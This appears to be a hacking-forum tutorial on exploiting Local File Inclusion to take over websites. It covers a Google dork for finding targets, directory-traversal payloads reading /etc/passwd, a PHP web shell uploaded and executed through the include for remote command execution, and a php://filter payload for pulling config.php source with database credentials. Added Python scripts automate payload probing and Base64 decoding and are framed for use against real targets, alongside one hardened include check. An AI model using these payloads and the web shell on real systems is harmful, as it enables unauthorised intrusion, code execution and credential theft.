BadB
Professional
Hello hacker, I finally have some free time, which I devoted to this article. Today we will learn how to use an LFI vulnerability to gain control over a site. Go!
Local File Inclusion - Take over the server.
What is Local File Inclusion?
LFI is a vulnerability in which server-side code includes (and, in PHP, executes) a local file whose name is built from user input. A specially crafted request lets a remote user read arbitrary files that the web server can open, including ones containing confidential information such as configuration files with credentials.
Simply put: the application opens files from the server based on a request parameter, filters that parameter insufficiently, and so lets you open an arbitrary file.
How to find a vulnerability?
Using Google, of course! A dork for finding candidate parameters looks something like this:
Code:
inurl:page?=.php
A dork only finds pages that take a file name in a parameter; every candidate still has to be tested.
We will now test whether the parameter is vulnerable. To do this, we replace the parameter's value with a directory-traversal path: a run of ../ sequences followed by etc/passwd.
This is an attempt to display the contents of the /etc/passwd file on a UNIX/Linux system, that is, to break out of the web root and read from the server's file system. If the response contains lines in the passwd format (seven colon-separated fields: user name, password placeholder, UID, GID, description, home directory, shell), the likelihood of a vulnerability increases significantly. The number of ../ needed depends on how deep the include directory sits below /, so try several depths. If nothing comes back, the application may be appending a fixed extension to the parameter or stripping ../ sequences; try other paths and encodings before giving up.
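The probe described above, as an added example that is not part of the original post: it generates the traversal payloads, recognises /etc/passwd in a response, and runs the payloads against a constructed stand-in for a vulnerable include. The URL, the parameter name file, and the in-memory file table are assumptions made so the script runs offline; the hardened safe_include beside the vulnerable handler shows the check that stops the traversal.

```python
"""Added example: probing a file-include parameter for LFI.

This is not code from the original post. The target URL, the parameter
name `file`, and the in-memory stand-in for a vulnerable server below
are assumptions so the script runs offline; replace `fake_fetch` with a
real HTTP GET (e.g. requests.get(url).text) to use it against a target
you are authorised to test.
"""
import posixpath
import re
from typing import Callable, Iterator, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# One line of /etc/passwd: name:password:UID:GID:GECOS:home:shell
PASSWD_LINE = re.compile(
    r"^[^:\n]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)


def looks_like_passwd(body: str) -> bool:
    """True if the response holds at least two passwd-format lines; two
    rules out a lone accidental match inside ordinary HTML."""
    return len(PASSWD_LINE.findall(body)) >= 2


def traversal_payloads(target: str = "etc/passwd", max_depth: int = 8) -> Iterator[str]:
    """Candidate parameter values: an absolute path first, then ../ runs of
    increasing depth, because the attacker does not know how deep the
    include directory sits below /."""
    yield "/" + target
    for depth in range(1, max_depth + 1):
        yield "../" * depth + target


def probe(fetch: Callable[[str], str], url: str, param: str) -> Optional[str]:
    """Send each payload through fetch(full_url) -> body and return the
    first payload whose response looks like /etc/passwd, else None."""
    for payload in traversal_payloads():
        body = fetch(f"{url}?{urlencode({param: payload})}")
        if looks_like_passwd(body):
            return payload
    return None


# --- constructed stand-in for the vulnerable application (assumption) ---
# Emulates `include("/var/www/html/pages/" . $_GET["file"])` without a
# web server. The file table is invented for the demonstration.
INCLUDE_BASE = "/var/www/html/pages/"
FAKE_FS = {
    "/var/www/html/pages/home.php": "<h1>Home</h1>",
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    ),
}


def vulnerable_include(file_param: str) -> str:
    """Unsafe: user input is glued onto a base directory, so ../ sequences
    walk out of it. An absolute path does NOT work here (it becomes
    .../pages//etc/passwd), which is why the probe also tries ../ runs."""
    path = posixpath.normpath(INCLUDE_BASE + file_param)
    return FAKE_FS.get(path, "Warning: include(): failed to open stream")


def safe_include(file_param: str) -> str:
    """Hardened: resolve the requested path and refuse anything that does
    not stay under INCLUDE_BASE. An allow-list of page names is stricter
    still and preferable where the set of pages is known."""
    path = posixpath.normpath(posixpath.join(INCLUDE_BASE, file_param))
    if not path.startswith(INCLUDE_BASE):
        return "Forbidden"
    return FAKE_FS.get(path, "Warning: include(): failed to open stream")


def fake_fetch(full_url: str) -> str:
    """Stand-in for an HTTP GET: routes the file parameter to the emulated
    vulnerable handler."""
    query = parse_qs(urlsplit(full_url).query)
    return vulnerable_include(query.get("file", [""])[0])


if __name__ == "__main__":
    hit = probe(fake_fetch, "http://www.example.com/open.php", "file")
    print("working payload:", hit)                 # ../../../../etc/passwd
    print("hardened handler:", safe_include(hit))  # Forbidden
```

Against a real target, replace fake_fetch with a function that performs the HTTP request and returns the body text; everything else stays the same. The absolute-path payload is kept first because an include with no directory prefix accepts it directly, while a prefixed include (as emulated here) needs the ../ runs.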
It's time to get full access to the server. To do this, we will turn the LFI vulnerability into code execution.
If there is a file upload form and you can upload PHP files, or bypass the filename checks, then you can include your uploaded file through the LFI vulnerability, provided you know the path where uploaded files are stored. Let's take a look at an example.
We create a file named exploit.php. Its content is an ordinary PHP script, a minimal web shell that runs whatever command is passed in the cmd parameter:
Code:
<?php
system($_GET['cmd']);
?>
In this example, we use the DVWA File Upload exercise.
As we can see, after the upload the web application tells us the path where the file was stored.
If the path is not shown, we have to brute-force it or try the standard upload directories used by popular CMS engines. Once the path is known, point the LFI parameter at the uploaded exploit.php and pass the command in cmd: the include executes the file as PHP, so the server runs the command as the web server user.
As you have seen, LFI attacks are not limited to reading files.
With a little thought, the vulnerable server can be turned into a remote shell.
Misconfiguration, such as incorrect file permissions, often makes this easier, though nothing guarantees it.
If you can't get code execution with any of the previous methods, here's a tip:
With LFI you can read the source of any PHP file the web server can open. Put " php://filter/read=convert.base64-encode/resource=FILETOREAD " into the file parameter in the URL. Here's an example:
www.example.com/open.php?file=php://filter/read=convert.base64-encode/resource=../../config.php
Here we get the contents of the config.php file.
This returns the file's source as Base64 instead of including it: a plain include would execute the PHP and show only its output, while the filter hands you the code itself, so you will need to decode the Base64. Because the filter string is handled by PHP's stream wrappers, it does not depend on allow_url_include, and if the application appends .php to the parameter, simply leave the extension off the resource.
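The php://filter trick above, as an added example that is not part of the original post: it builds the payload and URL, then pulls the Base64 out of the server's reply and decodes it back to PHP source. The URL, the parameter name file, and the sample response are constructed so the script runs offline.

```python
"""Added example: reading PHP source through php://filter.

Not code from the original post. The URL, the parameter name `file`,
and the sample server response are constructed so it runs offline.
"""
import base64
import re
from typing import Optional
from urllib.parse import urlencode

# A Base64 run long enough not to be an ordinary word in the page's HTML.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def filter_payload(path: str) -> str:
    """Value for the vulnerable parameter. convert.base64-encode makes PHP
    hand back the file's bytes instead of executing them, and Base64 keeps
    the <?php ... ?> source from being interpreted on the way out."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def filter_url(url: str, param: str, path: str) -> str:
    """Full request URL with the payload URL-encoded."""
    return f"{url}?{urlencode({param: filter_payload(path)})}"


def decode_filter_response(body: str) -> Optional[str]:
    """Extract the longest Base64 run from the response (the page's own
    HTML usually wraps it) and decode it; None if nothing decodes."""
    runs = B64_RUN.findall(body)
    if not runs:
        return None
    blob = max(runs, key=len)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: bad length/padding
        return None


# --- constructed sample (assumption): what a vulnerable open.php returns ---
CONFIG_SRC = (
    "<?php\n"
    "$db_host = 'localhost';\n"
    "$db_user = 'app';\n"
    "$db_pass = 'S3cret!';\n"
)
SAMPLE_RESPONSE = (
    "<html><body>"
    + base64.b64encode(CONFIG_SRC.encode()).decode()
    + "</body></html>"
)


if __name__ == "__main__":
    print(filter_url("http://www.example.com/open.php", "file", "../../config.php"))
    print(decode_filter_response(SAMPLE_RESPONSE))
```

Feed the body of the real HTTP response to decode_filter_response; choosing the longest Base64 run is what lets it cope with the surrounding page template, and a run that is not valid Base64 (wrong length or padding) yields None rather than garbage.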
That's all, good luck!
